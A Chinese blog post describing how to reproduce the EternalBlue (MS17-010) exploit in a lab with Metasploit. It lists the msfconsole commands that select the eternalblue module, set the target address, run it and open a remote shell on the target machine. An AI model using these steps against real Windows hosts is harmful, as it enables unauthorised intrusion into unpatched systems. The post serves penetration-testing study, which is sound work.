首页 > 其他分享 >永恒之蓝漏洞复现

永恒之蓝漏洞复现

时间:2023-09-11 16:12:10浏览次数:37  
标签:Metasploit 测试 渗透 漏洞 复现 模块 永恒 靶机

Metasploit Framework(简称MSF)是一款强大的开源渗透测试工具,具有多种功能和用途。它的主要作用包括:

渗透测试:Metasploit Framework允许安全专业人员模拟黑客攻击,以发现和利用系统和应用程序中的漏洞。这有助于组织识别并修复潜在的安全问题,提高系统的安全性。

漏洞利用:Metasploit包含大量的漏洞利用模块,可以用于入侵目标系统。这些模块使安全专业人员能够测试系统的弱点,以及评估它们是否容易受到攻击。

Payload生成:Metasploit可以生成各种Payload,包括恶意软件、木马、远程访问工具等。这些Payload可以用于渗透测试、远程控制目标系统以及进行漏洞利用。

模块化框架:Metasploit的模块化框架允许用户添加自定义模块,以扩展工具的功能。这使得Metasploit非常灵活,适用于各种不同的渗透测试需求。

渗透测试工具集:Metasploit不仅仅是一个工具,它还包括一系列辅助工具,用于信息收集、漏洞分析、社交工程等。这些工具可以帮助渗透测试专业人员更好地执行任务。

学习和教育:Metasploit是一个出色的学习工具,用于理解渗透测试技术、漏洞利用和网络安全。许多安全专业人员使用Metasploit来提高他们的技能,并教育新手渗透测试。

首先我们先用命令msfconsole打开msf

 

再用命令扫描目标是否存在 ms17-010 漏洞

msf5 > search ms17-010 

此处扫描到5个ms17-010模块的漏洞,此处使用的模块为永恒之蓝

使用口令use 0或者use exploit/windows/smb/ms17_010_eternalblue选中这个模块

用命令show options查看模块所需配置信息

看require和great setting是否有对应关系,如有对应就是默认配置,无对应则需要自行配置,此处RHOST(靶机地址)无对应关系,ipconfig查看靶机地址(打码处即为靶机地址)

利用命令set rhosts 靶机地址配置RHOST信息

根据靶机型号设置TARGETS

配置完成后使用命令run运行模块

等待一会儿后运行成功,输入shell拿到shell权限

解决乱码问题(乱码是因为 windows 和 linux 的编码不一样导致的)

输入命令chcp 65001即可解决

标签:Metasploit,测试,渗透,漏洞,复现,模块,永恒,靶机
From: https://www.cnblogs.com/BDAMBXA/p/17693790.html

相关文章

  • 华为云发布CodeArts Inspector漏洞管理服务,守护产品研发安全
    本文分享自华为云社区《华为云发布CodeArtsInspector漏洞管理服务,守护产品研发安全》,作者:华为云头条。2023年9月7日,华为云正式发布CodeArtsInspector漏洞管理服务。这是一款面向软件研发和服务运维提供的一站式漏洞管理能力,通过持续评估系统和应用等资产,内置风险量化管理和在......
  • Web攻防--JNDI注入--Log4j漏洞--Fastjson反序列化漏洞
    JNDI注入什么是JNDIJNDI全称为JavaNamingandDirectoryInterface(Java命名和目录接口),是一组应用程序接口,为开发人员查找和访问各种资源提供了统一的通用接口,可以用来定义用户、网络、机器、对象和服务等各种资源。JNDI支持的服务主要有:DNS、LDAP、CORBA、RMI等。简单从安全......
  • googlectf2023 gradebook 复现(TOCTOU)
    Gradebook结构根据函数sub_2247开头的部分可以推测出gradebook的结构0x4year0x8gradebookname(32bytes)0x28studentname(32bytes)0x48sizeofthisgradebook(uint)0x50firstgradestructureoffset0x58newgradestructureoffset每一条记录grade......
  • IDEFICS 简介: 最先进视觉语言模型的开源复现
    引言CodeLlama是为代码类任务而生的一组最先进的、开放的Llama2模型,我们很高兴能将其集成入HuggingFace生态系统!CodeLlama使用与Llama2相同的社区许可证,且可商用。今天,我们很高兴能发布HuggingFace对CodeLlama的全面支持,包括:Hub上的模型支持,包括模型......
  • SSRF漏洞拓展
    SSRF漏洞拓展目录SSRF漏洞拓展curl_exec函数一、ssrf配合gopher协议反弹shell二、ssrf配合gopher协议写马三、ssrf配合gopher协议ssh免密登录四、ssrf配合dict协议反弹shellcurl_exec函数一、ssrf配合gopher协议反弹shell实验环境:(1)192.168.142.201#redis服务器(2)192.168......
  • macOS Ventura 13.5.2 (22G91) Boot ISO 原版可引导镜像下载 (修复零日漏洞)
    macOSVentura13.5.2(22G91)BootISO原版可引导镜像下载(修复零日漏洞)2023年9月7日(北京时间8日凌晨)macOSVentura13.5.2(22G91)发布,此次为安全更新,主要修复了零日漏洞CVE-2023-41064CVE-2023-41061。这些漏洞修复的更新也包含在同日发布的iOS16.6.1、iPadOS......
  • macOS Ventura 13.5.2 (22G91) 正式版发布,修复零日漏洞 (ISO、IPSW、PKG 下载)
    macOSVentura13.5.2(22G91)正式版发布,修复零日漏洞(ISO、IPSW、PKG下载)2023年9月7日(北京时间8日凌晨)macOSVentura13.5.2(22G91)发布,此次为安全更新,主要修复了零日漏洞CVE-2023-41064CVE-2023-41061。这些漏洞修复的更新也包含在同日发布的iOS16.6.1、iPadO......
  • Tomcat7+ 弱口令 && 后台getshell漏洞
    目录Tomcat7+弱口令&&后台getshell漏洞1.1、漏洞描述1.2、漏洞等级1.3、影响版本1.4、漏洞复现1、基础环境2、漏洞扫描3、漏洞验证Tomcat7+弱口令&&后台getshell漏洞说明内容漏洞编号漏洞名称Tomcat7+弱口令&&后台getshell漏洞漏洞评级高危影响范......
  • Nginx_(背锅)解析漏洞复现
    目录Nginx解析漏洞复现1.1、漏洞描述1.2、漏洞等级1.3、影响版本1.4、漏洞复现1、基础环境2、漏洞扫描3、漏洞验证1.5、深度利用GetShellNginx解析漏洞复现说明内容漏洞编号漏洞名称漏洞评级影响范围漏洞描述Nginx解析漏洞该解析漏洞是PHPCGI的......
  • Nginx_0.7.65_空字节漏洞
    目录Nginx_0.7.65_空字节漏洞1.1、漏洞描述1.2、漏洞等级1.3、影响版本1.4、漏洞复现1、基础环境2、漏洞扫描3、漏洞验证Nginx_0.7.65_空字节漏洞1.1、漏洞描述1.2、漏洞等级1.3、影响版本0.7.651.4、漏洞复现1、基础环境链接:https://pan.baidu.com/s/1GBEb6ig6ogiQfXq-y......